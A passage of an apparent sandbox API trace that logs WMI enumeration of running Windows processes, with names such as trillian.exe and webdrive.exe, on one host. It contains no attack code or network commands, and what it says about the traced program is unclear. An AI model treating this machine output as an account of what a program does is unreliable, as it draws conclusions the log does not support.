[4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0214.470] WbemDefPath:IUnknown:AddRef (This=0x5630bd8) returned 0x3 [0214.470] WbemDefPath:IUnknown:QueryInterface (in: This=0x5630bd8, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0214.470] WbemDefPath:IUnknown:QueryInterface (in: This=0x5630bd8, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0214.470] WbemDefPath:IUnknown:QueryInterface (in: This=0x5630bd8, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x5631e38) returned 0x0 [0214.471] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5631e38, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0214.471] WbemDefPath:IUnknown:Release (This=0x5631e38) returned 0x3 [0214.471] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0214.471] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0214.471] WbemDefPath:IUnknown:QueryInterface (in: This=0x5630bd8, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0214.471] WbemDefPath:IUnknown:Release (This=0x5630bd8) returned 0x2 [0214.471] WbemDefPath:IUnknown:Release (This=0x5630bd8) returned 0x1 [0214.471] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0214.471] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0214.471] WbemDefPath:IUnknown:QueryInterface (in: This=0x5630bd8, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x5630bd8) returned 0x0 [0214.471] WbemDefPath:IUnknown:AddRef (This=0x5630bd8) returned 0x3 [0214.471] WbemDefPath:IUnknown:Release (This=0x5630bd8) returned 0x2 [0214.471] WbemDefPath:IWbemPath:SetText (This=0x5630bd8, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3028\"") returned 0x0 [0214.471] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0214.471] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0214.471] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.471] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0214.471] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0214.471] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.471] IWbemClassObject:Get (in: This=0x562e860, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26910b8*=0, plFlavor=0x26910bc*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="trillian.exe", varVal2=0x0), pType=0x26910b8*=8, plFlavor=0x26910bc*=0) returned 0x0 [0214.471] SysStringByteLen (bstr="trillian.exe") returned 0x18 [0214.472] SysStringByteLen (bstr="trillian.exe") returned 0x18 [0214.472] IWbemClassObject:Get (in: This=0x562e860, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26910b8*=8, plFlavor=0x26910bc*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="trillian.exe", varVal2=0x0), pType=0x26910b8*=8, plFlavor=0x26910bc*=0) returned 0x0 [0214.472] SysStringByteLen (bstr="trillian.exe") returned 0x18 [0214.472] SysStringByteLen (bstr="trillian.exe") returned 0x18 [0214.472] CoTaskMemAlloc (cb=0x4) returned 0x5631e68 [0214.472] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x5631e68, puReturned=0x267acc0 | out: apObjects=0x5631e68*=0x562e9f8, puReturned=0x267acc0*=0x1) returned 0x0 [0214.473] IUnknown:QueryInterface (in: This=0x562e9f8, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x562e9f8) returned 0x0 [0214.473] IUnknown:QueryInterface (in: This=0x562e9f8, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0214.473] IUnknown:QueryInterface (in: This=0x562e9f8, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0214.474] IUnknown:AddRef (This=0x562e9f8) returned 0x3 [0214.474] IUnknown:QueryInterface (in: This=0x562e9f8, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0214.474] IUnknown:QueryInterface (in: This=0x562e9f8, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0214.474] IUnknown:QueryInterface (in: This=0x562e9f8, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x562e9fc) returned 0x0 [0214.474] IMarshal:GetUnmarshalClass (in: This=0x562e9fc, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0214.474] IUnknown:Release (This=0x562e9fc) returned 0x3 [0214.474] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0214.474] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0214.474] IUnknown:QueryInterface (in: This=0x562e9f8, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0214.474] IUnknown:Release (This=0x562e9f8) returned 0x2 [0214.474] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0214.474] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0214.474] IUnknown:QueryInterface (in: This=0x562e9f8, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x562e9f8) returned 0x0 [0214.474] IUnknown:AddRef (This=0x562e9f8) returned 0x4 [0214.474] IUnknown:Release (This=0x562e9f8) returned 0x3 [0214.474] IUnknown:Release (This=0x562e9f8) returned 0x2 [0214.474] CoTaskMemFree (pv=0x5631e68) [0214.474] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0214.474] IUnknown:AddRef (This=0x562e9f8) returned 0x3 [0214.474] IWbemClassObject:Get (in: This=0x562e9f8, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0214.475] IWbemClassObject:Get (in: This=0x562e9f8, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3036\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0214.475] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3036\"") returned 0x66 [0214.475] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3036\"") returned 0x66 [0214.475] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0214.475] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0214.475] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0214.475] IUnknown:Release (This=0x6d0cac) returned 0x1 [0214.476] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x5631e68) returned 0x0 [0214.476] WbemDefPath:IUnknown:QueryInterface (in: This=0x5631e68, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0214.476] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5631e68, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x5630cb8) returned 0x0 [0214.476] WbemDefPath:IUnknown:Release (This=0x5631e68) returned 0x0 [0214.476] WbemDefPath:IUnknown:QueryInterface (in: This=0x5630cb8, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x5630cb8) returned 0x0 [0214.476] WbemDefPath:IUnknown:QueryInterface (in: This=0x5630cb8, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0214.477] WbemDefPath:IUnknown:AddRef (This=0x5630cb8) returned 0x3 [0214.477] WbemDefPath:IUnknown:QueryInterface (in: This=0x5630cb8, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0214.477] WbemDefPath:IUnknown:QueryInterface (in: This=0x5630cb8, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0214.477] WbemDefPath:IUnknown:QueryInterface (in: This=0x5630cb8, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x5631e78) returned 0x0 [0214.477] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5631e78, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0214.477] WbemDefPath:IUnknown:Release (This=0x5631e78) returned 0x3 [0214.477] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0214.477] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0214.477] WbemDefPath:IUnknown:QueryInterface (in: This=0x5630cb8, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0214.477] WbemDefPath:IUnknown:Release (This=0x5630cb8) returned 0x2 [0214.477] WbemDefPath:IUnknown:Release (This=0x5630cb8) returned 0x1 [0214.477] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0214.477] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0214.477] WbemDefPath:IUnknown:QueryInterface (in: This=0x5630cb8, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x5630cb8) returned 0x0 [0214.477] WbemDefPath:IUnknown:AddRef (This=0x5630cb8) returned 0x3 [0214.477] WbemDefPath:IUnknown:Release (This=0x5630cb8) returned 0x2 [0214.477] WbemDefPath:IWbemPath:SetText (This=0x5630cb8, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3036\"") returned 0x0 [0214.477] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0214.477] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0214.477] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.477] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0214.477] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0214.477] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.478] IWbemClassObject:Get (in: This=0x562e9f8, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x269192c*=0, plFlavor=0x2691930*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="webdrive.exe", varVal2=0x0), pType=0x269192c*=8, plFlavor=0x2691930*=0) returned 0x0 [0214.478] SysStringByteLen (bstr="webdrive.exe") returned 0x18 [0214.478] SysStringByteLen (bstr="webdrive.exe") returned 0x18 [0214.478] IWbemClassObject:Get (in: This=0x562e9f8, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x269192c*=8, plFlavor=0x2691930*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="webdrive.exe", varVal2=0x0), pType=0x269192c*=8, plFlavor=0x2691930*=0) returned 0x0 [0214.478] SysStringByteLen (bstr="webdrive.exe") returned 0x18 [0214.478] SysStringByteLen (bstr="webdrive.exe") returned 0x18 [0214.478] CoTaskMemAlloc (cb=0x4) returned 0x5631ea8 [0214.478] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x5631ea8, puReturned=0x267acc0 | out: apObjects=0x5631ea8*=0x562eb90, puReturned=0x267acc0*=0x1) returned 0x0 [0214.479] IUnknown:QueryInterface (in: This=0x562eb90, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x562eb90) returned 0x0 [0214.479] IUnknown:QueryInterface (in: This=0x562eb90, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0214.479] IUnknown:QueryInterface (in: This=0x562eb90, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0214.480] IUnknown:AddRef (This=0x562eb90) returned 0x3 [0214.480] IUnknown:QueryInterface (in: This=0x562eb90, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0214.480] IUnknown:QueryInterface (in: This=0x562eb90, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0214.480] IUnknown:QueryInterface (in: This=0x562eb90, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x562eb94) returned 0x0 [0214.480] IMarshal:GetUnmarshalClass (in: This=0x562eb94, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0214.480] IUnknown:Release (This=0x562eb94) returned 0x3 [0214.480] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0214.480] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0214.480] IUnknown:QueryInterface (in: This=0x562eb90, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0214.480] IUnknown:Release (This=0x562eb90) returned 0x2 [0214.480] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0214.480] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0214.480] IUnknown:QueryInterface (in: This=0x562eb90, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x562eb90) returned 0x0 [0214.480] IUnknown:AddRef (This=0x562eb90) returned 0x4 [0214.480] IUnknown:Release (This=0x562eb90) returned 0x3 [0214.480] IUnknown:Release (This=0x562eb90) returned 0x2 [0214.480] CoTaskMemFree (pv=0x5631ea8) [0214.481] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0214.481] IUnknown:AddRef (This=0x562eb90) returned 0x3 [0214.481] IWbemClassObject:Get (in: This=0x562eb90, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0214.481] IWbemClassObject:Get (in: This=0x562eb90, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3044\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0214.481] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3044\"") returned 0x66 [0214.481] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3044\"") returned 0x66 [0214.481] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0214.481] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0214.481] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0214.481] IUnknown:Release (This=0x6d0cac) returned 0x1 [0214.482] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x5631ea8) returned 0x0 [0214.482] WbemDefPath:IUnknown:QueryInterface (in: This=0x5631ea8, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0214.482] 